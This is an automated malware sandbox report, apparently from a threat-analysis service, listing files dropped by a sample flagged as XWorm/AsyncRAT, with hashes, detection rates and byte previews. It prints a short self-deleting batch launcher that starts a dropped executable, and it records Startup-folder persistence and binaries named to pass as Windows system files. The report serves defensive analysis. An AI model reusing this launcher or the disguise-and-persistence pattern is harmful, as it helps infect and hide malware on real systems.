Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	625432
Entropy (8bit):	7.993673176414941
Encrypted:	true
SSDEEP:	12288:dyVH8JO5nlelPUdcp1rdCJp/fBewYAoAu0tZV6w576ahQjaxUk:8t8uaUdcV0xYtAoAu0H0w576yQjO9
MD5:	08CE33649D6822FF0776EDE46CC65650
SHA1:	941535DABDB62C7CA74C32F791D2F4B263EC7D48
SHA-256:	48F50E8A693F3B1271949D849B9A70C76ACAA4C291608D869EFE77DE1432D595
SHA-512:	8398E54645093E3F169C0B128CBEDA3799D905173C9CB9548962ECBAF3D305620F0316C7C3F27077B148B8F6D3F6146B81C53B235F04AC54668DAB05B929D52F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C3;..RU..RU..RU....RU.H.T..RU.H.P..RU.H.Q..RU.H.V..RU.LT..RU..RT..RU...]..RU...U..RU......RU...W..RU.Rich.RU.........................PE..d...K.,d.........." ...".0...0......@.....................................................`.............................................."..........................................................................P...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc....0..........................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302872
Entropy (8bit):	7.986910218113021
Encrypted:	false
SSDEEP:	6144:9k/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiR:9kUfQJbUV2MhCwEQc5Np9zR
MD5:	F86F9B7EB2CB16FB815BB0650D9EF452
SHA1:	B9E217146EB6194FC38923AF5208119286C365AD
SHA-256:	B37D56AD48A70B802FB337D721120D753270DBDA0854B1BFB600893FB2CE4E7A
SHA-512:	6C448F6D6C069BA950C555529557F678DFD17C748B2279D5EEC530D7EB5DB193AA1CA18DD3CE9F5220E8681A0E50B00D7DE93C6744476C0E1872DAFD9D5DE775
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................................................................y.........Rich..........................PE..d...'.,d.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04slxbtk.zgb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oedx1jm.2mh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_201ao240.nap.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hjdknvn.5jd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kxjvpum.cwg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iith534.npn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvpjhlbr.3ff.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2zdcedf.hw4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euzo1hcq.oyg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1fqvdod.sdy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_isjsvbiu.xak.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvzqtmsx.eqf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luzsvpgs.agu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfshot2q.v53.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqvui5cs.3qj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv510wdb.llh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\greTr4XoY3.bat

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.269217844708175
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DE1R1cz/0UbKOZG1wkn23f7Jhn:OTg9YDES8CfjJh
MD5:	8275BA463F0F42ECA5BC626F441D782D
SHA1:	EADABA4B34E43B5515389EFAA7FBFE845BC1D5AE
SHA-256:	AAF901C3EC493F986332BB8C0A7FE5CC12EEE49C0C280B2996532D09EBC98405
SHA-512:	75C647AF690197161FDF186DF29E7A938A5AAC97AF01C87D4243D501E56BE9164912B14C5F925FDE4E184D662A7A99902D602C295CFD5DBE76D6DE14CA8A3F61
Malicious:	false
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\greTr4XoY3.bat"

C:\Users\user\AppData\Local\Temp\svchosts.exe

Download File

Process:	C:\Users\user\Desktop\Vjy8d2EoqK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1164420
Entropy (8bit):	6.3700733509127065
Encrypted:	false
SSDEEP:	24576:u2G/nvxW3WieCN4Q+UeeN4uJi7rOu+dwd/1vJjFiZkkd:ubA3jN4Q+bexidYawZky
MD5:	91F72031C3AD088797D77357FA39DB39
SHA1:	3239E0D975F52025B55B5BF4A6BFBE2C22B31263
SHA-256:	2233052384366ACB09B963B34F8C6DD27EE4C7799F60E553E7D0B70D6C46E85B
SHA-512:	8F2826A4AA5AD5355E7371A8B0641B7D8F1620C8204108077064B922381A551BF31E2491A01A47E2626CEB4D3E1809F5FD6ECC24D086F7B422A54291AB31B84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 5 11:32:41 2024, mtime=Mon Aug 5 11:32:41 2024, atime=Mon Aug 5 11:32:41 2024, length=54784, window=hide
Category:	dropped
Size (bytes):	764
Entropy (8bit):	5.03576809524861
Encrypted:	false
SSDEEP:	12:8wn24jWCF7dY//cE6cEL2SeijAsl5rHkUa/MBmV:8qyG7+0E6cm2SeeAsl5YUa/MBm
MD5:	C9147CFA1C06A5F728D6B9C87849E3D5
SHA1:	172CBF4529D58F541F43A9932AACD4F2A6302C16
SHA-256:	F9A32324CF19997A6513E55FCC31D6DE4D5C05A494B27155364A33C8C8299A40
SHA-512:	34A7D302CC3C93440B471FFD9535A2B6D83CB13030A4951D395597408E6687192BB767CDCA18983FEF2F3C0A84386E75E50AE1BCD98E2D611E42E75E9C53BAF1
Malicious:	false
Preview:	L..................F.... ....CQ.3....CQ.3....CQ.3...........................v.:..DG..Yr?.D..U..k0.&...&......vk.v.....?Kt3....~.3.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.d...........................%..A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......CW.^.Y.c...........................#..R.o.a.m.i.n.g.....b.2......Y.d .XClient.exe.H.......Y.d.Y.d..............................X.C.l.i.e.n.t...e.x.e.......Y...............-.......X...........@........C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......927537...........hT..CrF.f4... ...a.&S...,.......hT..CrF.f4... ...a.&S...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	54784
Entropy (8bit):	5.865893416493186
Encrypted:	false
SSDEEP:	1536:ABCSePghTBz+uO9S+bUwga3HX6l+OZ1aSC:Acgh1zF+bUiHlOZ1lC
MD5:	BF19D4A22F47EEA6DD1DB1C98A5AAC07
SHA1:	384506BF1E83DF03D48CDC59E7EFB03D8087D3C5
SHA-256:	A7F98D3361874AC82332FBB9CDED7BE12EF8CB6699305351E27247A2B464272C
SHA-512:	C8C6FAB16E60FAB5BEB5B209C8FB5446D7E9B46E40EB575D0D8004A634578831DDE56C257B6621E4382C9AB674FDEC005F903DF84A4A4E7A32A952ACE92980AE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f............................>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<`..........&.....................................................(.....r...p. ~.H...(.....ro..p. .O...s.........s.........s.........s..........r...p. h.:..r...p. .x!..r...p. ..[..r...p. ..?..r...p. &.....((....r...p. .s...r7..p"(....+.&(....&+..+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-..r...p. S....r9..p.rW..p. .(T..ru..p. .._..r...p.r...p. .0................j..................s]..............~........."(I...+.:.t..

C:\Windows\SysWOW64\it-IT\21b1a557fd31cc

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.960479296672176
Encrypted:	false
SSDEEP:	3:Q7vmuP2WWQvKQZjpSUzij/d2n:Q7vmuP2WxvKkVSMu/0
MD5:	4E349D72EA8A52B14156E32443935C72
SHA1:	12A4B8A78E9463289FFEBE76B2784DA618DE7CC0
SHA-256:	75950BFDB8EF32D5AD1C25A931EFC718A89711D50FD98C8FE956725DC22C59D8
SHA-512:	05405AB9E211E1C123A0878F2BCDE5B534C30F541BF158CD4960B8CCA50F6C9B3C85AB9804C26792791C31A389ED1FC7860FC3BD977A29C53B153170AF1F4C12
Malicious:	false
Preview:	NsvcwdXhsSgfxKN4LwnsRXAGvFVSjZSRst0rCoYd4sIFLYVT1BVGyYv0sorrIE8S

C:\Windows\SysWOW64\it-IT\dasHost.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\addins\cmd.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\addins\ebf1f9fa8afd6d

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.600296272715302
Encrypted:	false
SSDEEP:	3:qmGLBvfmUPO8WsCRunyLORhvRhumCsNsvYVeX/Nju1eDtiXYSW:qmGleWO8s/LOHvRhujs+vYIXFju1cQXe
MD5:	7679E77AE1B44A90B12355E2491E3A2E
SHA1:	B194B382A1439F64A987D69FBBB4CD7CD0AF7B19
SHA-256:	6634D4C83E5E51BCB066EA22FDFB256D88F6A18AFE5F7453964C365F0EEB4857
SHA-512:	AFC557446CEA76A5A9B920686BB4C1CF47F5E7A76B7AF2FC25CBD8DDE5602762935614854461D4BD303B37E4B2B032EFCEA440D637E8A41EA138F07A82BD3485
Malicious:	false
Preview:	QvC6qNnZdnmWQ7IfR7NwOcN1jCm8uadU6pEFMUyTdLMTguKs3kmYxJ4xhLWnkooDJRak3CT7J4TCQ4Vy24EKyFhxvQhB7KsyhIJOUjy0RoP2z2hn0ivqjePEunznfSA8MffHuGeSFO2J0o73

C:\Windows\apppatch\en-US\088424020bedd6

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.804137514149156
Encrypted:	false
SSDEEP:	6:xMtWyAjhRdMLeIUXmwR7I7GcuOdsxSJAJDppzWvc41WCunZ3n:+tWyM3KlqW6cuLSJ+NpqE41WlnZ3n
MD5:	8C543C451B39F82D836D24CB2584070B
SHA1:	0A7AFCAE0E33C882DAF194A3F20A2ED5BDB6C213
SHA-256:	26F2C39D7924A17F14E0326161165C61208BB5FF505E7FE838429A96DDCB7565
SHA-512:	21F8C6DE057E4898760FEC088CDBB6B290ADA809529BACEF26353244865FAE80F9BA96B88484A025015A40B04AA302CCCD2A88300EA496BB0279AEEEEE893E26
Malicious:	false
Preview:	t2CqgD4KOGQ4rcsjnHCZklpPntXBawNvtlJBc3bjlJwUECtasNOR9ZrIMxDwq3tc3fKFTqHupcxayVKkA6SNi6vU4Ayp0p2sZUbj1nGCGelglQT1mcvukg36tzLS1b49jEBe3ksWzQGEUPsnr7CX3IH3ae0BcyKojm6gPy7BtZ4UZzldHhl4ZgGb7IEYuq4BFcesSLY2AAneNwdk3W45MPPDffjGuiRCe3O7V3L5It4Y2lNKodfXw8z0NaMwmRHbtl9UhgP9K9wcV0K4RYbQC4QgDYu4qYS1lcpR

C:\Windows\apppatch\en-US\conhost.exe

Download File

Process:	C:\Brokercrt\comReviewsession.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.0749660749943555
Encrypted:	false
SSDEEP:	12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
MD5:	24DAFEB85B4C72D29606ADF2A59DA04C
SHA1:	82903E26C42111B5CBC0214BCD710B487B6C4B21
SHA-256:	0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
SHA-512:	6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
